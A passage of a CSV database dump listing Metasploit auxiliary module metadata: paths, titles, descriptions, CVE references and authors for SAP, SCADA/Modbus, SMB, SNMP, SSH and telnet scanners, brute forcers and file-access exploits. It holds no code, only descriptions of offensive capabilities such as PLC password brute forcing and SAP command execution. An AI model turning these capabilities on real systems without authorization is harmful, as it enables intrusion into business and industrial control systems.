08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb","auxiliary","scanner/sap/sap_soap_rfc_ping","auxiliary/scanner/sap/sap_soap_rfc_ping","SAP /sap/bc/soap/rfc SOAP Service RFC_PING Function Service Discovery",300,"This module makes use of the RFC_PING function, through the /sap/bc/soap/rfc SOAP service, to test connectivity to remote RFC destinations.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","Agnivesh Sathasivam, nmonkee" 1669,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb","auxiliary","scanner/sap/sap_soap_rfc_read_table","auxiliary/scanner/sap/sap_soap_rfc_read_table","SAP /sap/bc/soap/rfc SOAP Service RFC_READ_TABLE Function Dump Data",300,"This module makes use of the RFC_READ_TABLE Function to read data from tables using the /sap/bc/soap/rfc SOAP service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","Agnivesh Sathasivam, nmonkee" 1670,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb","auxiliary","scanner/sap/sap_soap_rfc_rzl_read_dir","auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir","SAP SOAP RFC RZL_READ_DIR_LOCAL Directory Contents Listing",300,"This module exploits the SAP NetWeaver RZL_READ_DIR_LOCAL function, on the SAP SOAP RFC Service, to enumerate directory contents. It returns only the first 32 characters of the filename since they are truncated. The module can also be used to capture SMB hashes by using a fake SMB share as DIR.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","OSVDB-92732, URL-http://erpscan.com/advisories/dsecrg-12-026-sap-netweaver-rzl_read_dir_local-missing-authorization-check-and-smb-relay-vulnerability/","Alexey Tyurin, nmonkee" 1671,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb","auxiliary","scanner/sap/sap_soap_rfc_susr_rfc_user_interface","auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface","SAP /sap/bc/soap/rfc SOAP Service SUSR_RFC_USER_INTERFACE Function User Creation",300,"This module makes use of the SUSR_RFC_USER_INTERFACE function, through the SOAP /sap/bc/soap/rfc service, for creating/modifying users on a SAP.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","Agnivesh Sathasivam, nmonkee" 1672,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb","auxiliary","scanner/sap/sap_soap_rfc_sxpg_call_system_exec","auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec","SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Execution",300,"This module makes use of the SXPG_CALL_SYSTEM Remote Function Call, through the use of the /sap/bc/soap/rfc SOAP service to execute OS commands as configured in the SM69 transaction.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","Agnivesh Sathasivam, nmonkee" 1673,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb","auxiliary","scanner/sap/sap_soap_rfc_sxpg_command_exec","auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec","SAP SOAP RFC SXPG_COMMAND_EXECUTE",300,"This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call, through the use of the /sap/bc/soap/rfc SOAP service to execute OS commands as configured in the SM69 transaction.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","Agnivesh Sathasivam, nmonkee" 1674,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb","auxiliary","scanner/sap/sap_soap_rfc_system_info","auxiliary/scanner/sap/sap_soap_rfc_system_info","SAP /sap/bc/soap/rfc SOAP Service RFC_SYSTEM_INFO Function Sensitive Information Gathering",300,"This module makes use of the RFC_SYSTEM_INFO Function to obtain the operating system version, SAP version, IP address and other information through the use of the /sap/bc/soap/rfc SOAP service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2006-6010, URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","Agnivesh Sathasivam, ChrisJohnRiley, nmonkee" 1675,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb","auxiliary","scanner/sap/sap_soap_th_saprel_disclosure","auxiliary/scanner/sap/sap_soap_th_saprel_disclosure","SAP /sap/bc/soap/rfc SOAP Service TH_SAPREL Function Information Disclosure",300,"This module attempts to identify software, OS and DB versions through the SAP function TH_SAPREL using the /sap/bc/soap/rfc SOAP service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","Agnivesh Sathasivam, nmonkee" 1676,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb","auxiliary","scanner/sap/sap_web_gui_brute_login","auxiliary/scanner/sap/sap_web_gui_brute_login","SAP Web GUI Login Brute Forcer",300,"This module attempts to brute force SAP username and passwords through the SAP Web GUI service. Default clients can be tested without needing to set a CLIENT. Common and default user/password combinations can be tested just setting the DEFAULT_CRED variable to true. The MSF_DATA_DIRECTORY/wordlists/sap_default.txt path store stores these default combinations.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","nmonkee" 1677,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/scada/digi_addp_reboot.rb","auxiliary","scanner/scada/digi_addp_reboot","auxiliary/scanner/scada/digi_addp_reboot","Digi ADDP Remote Reboot Initiator",300,"Reboot Digi International based equipment through the ADDP service","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://qbeukes.blogspot.com/2009/11/advanced-digi-discovery-protocol_21.html, URL-http://www.digi.com/wiki/developer/index.php/Advanced_Device_Discovery_Protocol_%28ADDP%29","hdm " 1678,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/scada/digi_addp_version.rb","auxiliary","scanner/scada/digi_addp_version","auxiliary/scanner/scada/digi_addp_version","Digi ADDP Information Discovery",300,"Discover host information through the Digi International ADDP service","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://qbeukes.blogspot.com/2009/11/advanced-digi-discovery-protocol_21.html, URL-http://www.digi.com/wiki/developer/index.php/Advanced_Device_Discovery_Protocol_%28ADDP%29","hdm " 1679,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb","auxiliary","scanner/scada/digi_realport_serialport_scan","auxiliary/scanner/scada/digi_realport_serialport_scan","Digi RealPort Serial Server Port Scanner",300,"Identify active ports on RealPort-enabled serial servers.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.digi.com/pdf/fs_realport.pdf, URL-http://www.digi.com/support/productdetail?pid=2229&type=drivers","hdm " 1680,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/scada/digi_realport_version.rb","auxiliary","scanner/scada/digi_realport_version","auxiliary/scanner/scada/digi_realport_version","Digi RealPort Serial Server Version",300,"Detect serial servers that speak the RealPort protocol.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.digi.com/pdf/fs_realport.pdf, URL-http://www.digi.com/support/productdetail?pid=2229&type=drivers","hdm " 1681,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb","auxiliary","scanner/scada/indusoft_ntwebserver_fileaccess","auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess","Indusoft WebStudio NTWebServer Remote File Access",300,"This module exploits a directory traversal vulnerability in Indusoft WebStudio. The vulnerability exists in the NTWebServer component and allows to read arbitrary remote files with the privileges of the NTWebServer process. The module has been tested successfully on Indusoft WebStudio 6.1 SP6.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-47842, CVE-2011-1900, OSVDB-73413, URL-http://www.indusoft.com/hotfixes/hotfixes.php","Unknown, juan vazquez " 1682,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/scada/koyo_login.rb","auxiliary","scanner/scada/koyo_login","auxiliary/scanner/scada/koyo_login","Koyo DirectLogic PLC Password Brute Force Utility",300,"This module attempts to authenticate to a locked Koyo DirectLogic PLC. The PLC uses a restrictive passcode, which can be A0000000 through A9999999. The ""A"" prefix can also be changed by the administrator to any other character, which can be set through the PREFIX option of this module. This module is based on the original 'koyobrute.rb' Basecamp module from DigitalBond.","Metasploit Framework License (BSD)","f","2012-01-19 00:00:00",,,"aggressive","t","URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/","K. Reid Wightman , todb " 1683,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/scada/modbus_findunitid.rb","auxiliary","scanner/scada/modbus_findunitid","auxiliary/scanner/scada/modbus_findunitid","Modbus Unit ID and Station ID Enumerator",300,"Modbus is a cleartext protocol used in common SCADA systems, developed originally as a serial-line (RS232) async protocol, and later transformed to IP, which is called ModbusTCP. default tcpport is 502. This module sends a command (0x04, read input register) to the modbus endpoint. If this command is sent to the correct unit-id, it returns with the same funcion-id. if not, it should be added 0x80, so that it sys 0x84, and an exception-code follows which do not interest us. This does not always happen, but at least the first 4 bytes in the return-packet should be exact the same as what was sent. You can change port, ip and the scan-range for unit-id. There is also added a value - BENICE - to make the scanner sleep a second or more between probes. We have seen installations where scanning too many too fast works like a DoS.","Metasploit Framework License (BSD)","f","2012-10-28 00:00:00",,,"aggressive","t","URL-http://en.wikipedia.org/wiki/Modbus:TCP, URL-http://www.saia-pcd.com/en/products/plc/pcd-overview/Pages/pcd1-m2.aspx","EsMnemon " 1684,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/scada/modbusclient.rb","auxiliary","scanner/scada/modbusclient","auxiliary/scanner/scada/modbusclient","Modbus Client Utility",300,"This module sends a command (0x06, write to one register) to a Modbus endpoint. You can change port, IP, register to write and data to write, as well as unit-id. Modbus is a clear text protocol used in common SCADA systems, developed originally as a serial-line (RS232) async protocol. It is later transformed to IP, which is called ModbusTCP. There are a handful of functions which are possible to do, but this client has only implemented the function ""write value to register"" (\x48).","Metasploit Framework License (BSD)","f","2011-11-01 00:00:00",,,"aggressive","t","URL-http://www.saia-pcd.com/en/products/plc/pcd-overview/Pages/pcd1-m2.aspx","EsMnemon " 1685,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/scada/modbusdetect.rb","auxiliary","scanner/scada/modbusdetect","auxiliary/scanner/scada/modbusdetect","Modbus Version Scanner",300,"This module detects the Modbus service, tested on a SAIA PCD1.M2 system. Modbus is a clear text protocol used in common SCADA systems, developed originally as a serial-line (RS232) async protocol, and later transformed to IP, which is called ModbusTCP.","Metasploit Framework License (BSD)","f","2011-11-01 00:00:00",,,"aggressive","t","URL-http://en.wikipedia.org/wiki/Modbus:TCP, URL-http://www.saia-pcd.com/en/products/plc/pcd-overview/Pages/pcd1-m2.aspx","EsMnemon " 1686,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb","auxiliary","scanner/scada/sielco_winlog_fileaccess","auxiliary/scanner/scada/sielco_winlog_fileaccess","Sielco Sistemi Winlog Remote File Access",300,"This module exploits a directory traversal in Sielco Sistemi Winlog. The vulnerability exists in the Runtime.exe service and can be triggered by sending a specially crafted packet to the 46824/TCP port. This module has been successfully tested on Sielco Sistemi Winlog Lite 2.07.14.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-54212, EDB-19409, OSVDB-83275, URL-http://aluigi.altervista.org/adv/winlog_2-adv.txt","Luigi Auriemma, juan vazquez " 1687,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sip/enumerator.rb","auxiliary","scanner/sip/enumerator","auxiliary/scanner/sip/enumerator","SIP Username Enumerator (UDP)",300,"Scan for numeric username/extensions using OPTIONS/REGISTER requests","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"et " 1688,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sip/enumerator_tcp.rb","auxiliary","scanner/sip/enumerator_tcp","auxiliary/scanner/sip/enumerator_tcp","SIP Username Enumerator (TCP)",300,"Scan for numeric username/extensions using OPTIONS/REGISTER requests","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"et " 1689,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sip/options.rb","auxiliary","scanner/sip/options","auxiliary/scanner/sip/options","SIP Endpoint Scanner (UDP)",300,"Scan for SIP devices using OPTIONS requests","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1690,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sip/options_tcp.rb","auxiliary","scanner/sip/options_tcp","auxiliary/scanner/sip/options_tcp","SIP Endpoint Scanner (TCP)",300,"Scan for SIP devices using OPTIONS requests","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1691,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb","auxiliary","scanner/sip/sipdroid_ext_enum","auxiliary/scanner/sip/sipdroid_ext_enum","SIPDroid Extension Grabber",300,"This module exploits a leak of extension/SIP Gateway on SIPDroid 1.6.1 beta, 2.0.1 beta, 2.2 beta (tested in Android 2.1 and 2.2 - official Motorola release) (other versions may be affected).","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-47710, URL-http://seclists.org/fulldisclosure/2011/May/83","Anibal Aguiar " 1692,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/smb/pipe_auditor.rb","auxiliary","scanner/smb/pipe_auditor","auxiliary/scanner/smb/pipe_auditor","SMB Session Pipe Auditor",300,"Determine what named pipes are accessible over SMB","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1693,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb","auxiliary","scanner/smb/pipe_dcerpc_auditor","auxiliary/scanner/smb/pipe_dcerpc_auditor","SMB Session Pipe DCERPC Auditor",300,"Determine what DCERPC services are accessible over a SMB pipe","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1694,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb","auxiliary","scanner/smb/psexec_loggedin_users","auxiliary/scanner/smb/psexec_loggedin_users","Microsoft Windows Authenticated Logged In Users Enumeration",300,"This module uses a valid administrator username and password to enumerate users currently logged in, using a similar technique than the ""psexec"" utility provided by SysInternals. It uses reg.exe to query the HKU base registry key.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0504, OSVDB-3106, URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx, URL-http://www.pentestgeek.com/2012/11/05/finding-logged-in-users-metasploit-module/","Royce Davis @R3dy__ " 1695,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/smb/smb2.rb","auxiliary","scanner/smb/smb2","auxiliary/scanner/smb/smb2","SMB 2.0 Protocol Detection",300,"Detect systems that support the SMB 2.0 protocol","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1696,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/smb/smb_enumshares.rb","auxiliary","scanner/smb/smb_enumshares","auxiliary/scanner/smb/smb_enumshares","SMB Share Enumeration",300,"Determine what shares are provided by the SMB service","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1697,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/smb/smb_enumusers.rb","auxiliary","scanner/smb/smb_enumusers","auxiliary/scanner/smb/smb_enumusers","SMB User Enumeration (SAM EnumUsers)",300,"Determine what local users exist via the SAM RPC service","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1698,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb","auxiliary","scanner/smb/smb_enumusers_domain","auxiliary/scanner/smb/smb_enumusers_domain","SMB Domain User Enumeration",300,"Determine what domain users are logged into a remote system via a DCERPC to NetWkstaUserEnum.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://msdn.microsoft.com/en-us/library/aa370669%28VS.85%29.aspx","natron " 1699,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/smb/smb_login.rb","auxiliary","scanner/smb/smb_login","auxiliary/scanner/smb/smb_login","SMB Login Check Scanner",300,"This module will test a SMB login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0506","Ben Campbell , tebo " 1700,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/smb/smb_lookupsid.rb","auxiliary","scanner/smb/smb_lookupsid","auxiliary/scanner/smb/smb_lookupsid","SMB Local User Enumeration (LookupSid)",300,"Determine what users exist via brute force SID lookups. This module can enumerate both local and domain accounts by setting ACTION to either LOCAL or DOMAIN","Metasploit Framework License (BSD)","f",,,"LOCAL","aggressive","t",,"hdm " 1701,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/smb/smb_version.rb","auxiliary","scanner/smb/smb_version","auxiliary/scanner/smb/smb_version","SMB Version Detection",300,"Display version information about each system","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1702,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/smtp/smtp_enum.rb","auxiliary","scanner/smtp/smtp_enum","auxiliary/scanner/smtp/smtp_enum","SMTP User Enumeration Utility",300,"The SMTP service has two internal commands that allow the enumeration of users: VRFY (confirming the names of valid users) and EXPN (which reveals the actual address of users aliases and lists of e-mail (mailing lists)). Through the implementation of these SMTP commands can reveal a list of valid users.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0531, OSVDB-12551, URL-http://www.ietf.org/rfc/rfc2821.txt","==[ Alligator Security Team ]==, Heyder Andrade " 1703,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/smtp/smtp_version.rb","auxiliary","scanner/smtp/smtp_version","auxiliary/scanner/smtp/smtp_version","SMTP Banner Grabber",300,"SMTP Banner Grabber","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.ietf.org/rfc/rfc2821.txt","CG " 1704,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/snmp/aix_version.rb","auxiliary","scanner/snmp/aix_version","auxiliary/scanner/snmp/aix_version","AIX SNMP Scanner Auxiliary Module",300,"AIX SNMP Scanner Auxiliary Module","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Adriano Lima , Ramon de C Valle " 1705,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb","auxiliary","scanner/snmp/cisco_config_tftp","auxiliary/scanner/snmp/cisco_config_tftp","Cisco IOS SNMP Configuration Grabber (TFTP)",300,"This module will download the startup or running configuration from a Cisco IOS device using SNMP and TFTP. A read-write SNMP community is required. The SNMP community scanner module can assist in identifying a read-write community. The target must be able to connect back to the Metasploit system and the use of NAT will cause the TFTP transfer to fail.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , pello " 1706,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/snmp/cisco_upload_file.rb","auxiliary","scanner/snmp/cisco_upload_file","auxiliary/scanner/snmp/cisco_upload_file","Cisco IOS SNMP File Upload (TFTP)",300,"This module will copy file to a Cisco IOS device using SNMP and TFTP. A read-write SNMP community is required. The SNMP community scanner module can assist in identifying a read-write community. The target must be able to connect back to the Metasploit system and the use of NAT will cause the TFTP transfer to fail.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"pello " 1707,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/snmp/snmp_enum.rb","auxiliary","scanner/snmp/snmp_enum","auxiliary/scanner/snmp/snmp_enum","SNMP Enumeration Module",300,"This module allows enumeration of any devices with SNMP protocol support. It supports hardware, software, and network information. The default community used is ""public"".","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://en.wikipedia.org/wiki/Simple_Network_Management_Protocol, URL-http://net-snmp.sourceforge.net/docs/man/snmpwalk.html, URL-http://www.nothink.org/perl/snmpcheck/","Matteo Cantoni " 1708,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/snmp/snmp_enumshares.rb","auxiliary","scanner/snmp/snmp_enumshares","auxiliary/scanner/snmp/snmp_enumshares","SNMP Windows SMB Share Enumeration",300,"This module will use LanManager OID values to enumerate SMB shares on a Windows system via SNMP","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"tebo " 1709,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/snmp/snmp_enumusers.rb","auxiliary","scanner/snmp/snmp_enumusers","auxiliary/scanner/snmp/snmp_enumusers","SNMP Windows Username Enumeration",300,"This module will use LanManager OID values to enumerate local user accounts on a Windows system via SNMP","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"tebo " 1710,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/snmp/snmp_login.rb","auxiliary","scanner/snmp/snmp_login","auxiliary/scanner/snmp/snmp_login","SNMP Community Scanner",300,"Scan for SNMP devices using common community names","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0508","hdm " 1711,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/snmp/snmp_set.rb","auxiliary","scanner/snmp/snmp_set","auxiliary/scanner/snmp/snmp_set","SNMP Set Module",300,"This module, similar to snmpset tool, uses the SNMP SET request to set information on a network entity. A OID (numeric notation) and a value are required. Target device must permit write access.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://en.wikipedia.org/wiki/Simple_Network_Management_Protocol, URL-http://www.net-snmp.org/docs/man/snmpset.html, URL-http://www.oid-info.com/","Matteo Cantoni " 1712,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb","auxiliary","scanner/snmp/xerox_workcentre_enumusers","auxiliary/scanner/snmp/xerox_workcentre_enumusers","Xerox WorkCentre User Enumeration (SNMP)",300,"This module will do user enumeration based on the Xerox WorkCentre present on the network. SNMP is used to extract the usernames.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"pello " 1713,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb","auxiliary","scanner/ssh/ssh_identify_pubkeys","auxiliary/scanner/ssh/ssh_identify_pubkeys","SSH Public Key Acceptance Scanner",300,"This module can determine what public keys are configured for key-based authentication across a range of machines, users, and sets of known keys. The SSH protocol indicates whether a particular key is accepted prior to the client performing the actual signed authentication request. To use this module, a text file containing one or more SSH keys should be provided. These can be private or public, so long as no passphrase is set on the private keys. If you have loaded a database plugin and connected to a database this module will record authorized public keys and hosts so you can track your process. Key files may be a single public (unencrypted) key, or several public keys concatenated together as an ASCII text file. Non-key data should be silently ignored. Private keys will only utilize the public key component stored within the key file.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , todb " 1714,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/ssh/ssh_login.rb","auxiliary","scanner/ssh/ssh_login","auxiliary/scanner/ssh/ssh_login","SSH Login Check Scanner",300,"This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","todb " 1715,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb","auxiliary","scanner/ssh/ssh_login_pubkey","auxiliary/scanner/ssh/ssh_login_pubkey","SSH Public Key Login Scanner",300,"This module will test ssh logins on a range of machines using a defined private key file, and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. Note that password-protected key files will not function with this module -- it is designed specifically for unencrypted (passwordless) keys. Key files may be a single private (unencrypted) key, or several private keys concatenated together as an ASCII text file. Non-key data should be silently ignored.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"todb " 1716,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/ssh/ssh_version.rb","auxiliary","scanner/ssh/ssh_version","auxiliary/scanner/ssh/ssh_version","SSH Version Scanner",300,"Detect SSH Version.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://en.wikipedia.org/wiki/SecureShell","Daniel van Eeden " 1717,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/telephony/wardial.rb","auxiliary","scanner/telephony/wardial","auxiliary/scanner/telephony/wardial","Wardialer",300,"Scan for dial-up systems that are connected to modems and answer telephony indials.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"I)ruid " 1718,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb","auxiliary","scanner/telnet/lantronix_telnet_password","auxiliary/scanner/telnet/lantronix_telnet_password","Lantronix Telnet Password Recovery",300,"This module retrieves the setup record from Lantronix serial-to-ethernet devices via the config port (30718/udp, enabled by default) and extracts the telnet password. It has been tested successfully on a Lantronix Device Server with software version V5.8.0.1.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"jgor" 1719,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb","auxiliary","scanner/telnet/lantronix_telnet_version","auxiliary/scanner/telnet/lantronix_telnet_version","Lantronix Telnet Service Banner Detection",300,"Detect Lantronix telnet services","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , theLightCosine " 1720,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb","auxiliary","scanner/telnet/telnet_encrypt_overflow","auxiliary/scanner/telnet/telnet_encrypt_overflow","Telnet Service Encyption Key ID Overflow Detection",300,"Detect telnet services vulnerable to the encrypt option Key ID overflow (BSD-derived telnetd)","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-51182, CVE-2011-4862, EDB-18280, URL-https://community.rapid7.com/community/metasploit/blog/2011/12/28/more-fun-with-bsd-derived-telnet-daemons","Jaime Penalba Estebanez , hdm " 1721,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/telnet/telnet_login.rb","auxiliary","scanner/telnet/telnet_login","auxiliary/scanner/telnet/telnet_login","Telnet Login Check Scanner",300,"This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","egypt " 1722,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb","auxiliary","scanner/telnet/telnet_ruggedcom","auxiliary/scanner/telnet/telnet_ruggedcom","RuggedCom Telnet Password Generator",300,"This module will calculate the password for the hard-coded hidden username ""factory"" in the RuggedCom Rugged Operating System (ROS). The password is dynamically generated based on the devices MAC address.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2012-1803, EDB-18779, US-CERT-VU-889195","Borja Merino , jc" 1723,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/telnet/telnet_version.rb","auxiliary","scanner/telnet/telnet_version","auxiliary/scanner/telnet/telnet_version","Telnet Service Banner Detection",300,"Detect telnet services","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1724,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb","auxiliary","scanner/tftp/ipswitch_whatsupgold_tftp","auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp","IpSwitch WhatsUp Gold TFTP Directory Traversal",300,"This modules exploits a directory traversal vulnerability in IpSwitch WhatsUp Gold's TFTP service.","Metasploit 